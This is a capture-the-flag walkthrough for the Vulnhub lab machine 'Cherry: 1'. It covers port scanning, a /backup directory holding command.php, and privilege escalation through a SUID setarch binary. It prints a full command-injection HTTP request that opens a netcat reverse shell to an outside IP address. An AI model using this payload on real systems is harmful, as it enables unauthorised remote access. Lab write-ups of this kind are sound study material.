Vulnhub - Cherry: 1
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
This is another easy rated box from the same people who made Chili.
This time we get four ports:
- 22/tcp open ssh
- 80/tcp open http
- 7755/tcp open unknown
- 33060/tcp open mysqlx
With a detail scan we find out that port 80 is running nginx and port 7755 is another HTTP server, but this time it’s apache. Nmap isn’t sure what port 33060 is, despite suggesting it may be mysqlx.
Fuzzing for subdomains turns up nothing, and gobusting turns up just a single directory - /backup. We get a picture of a cherry from the front page of the webservers, but this time I didn’t bother with trying stego techniques on it. The two webservers appear basically identical, except on apache we can access /backup whereas on nginx it’s forbidden.
So, what’s in backup? This stuff:
- command.php 2020-09-07 03:30 293
- latest.tar.gz 2020-09-01 18:54 12M
- master.zip 2020-09-07 03:33 11M
- master.zip.bak 2020-09-07 03:34 11M
We download these files, and the interesting one is command.php. Here’s what it contains:
Hmm. So what happens if we do this?:
So this gives us our RCE.
I used Burp Suite with the following payload:
GET /backup/command.php?backup=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.77+1235+>/tmp/f HTTP/1.1
to get a shell, and then I ran Linpeas.
It’s an SUID binary; this time it’s setarch
So yes, it was easy after all.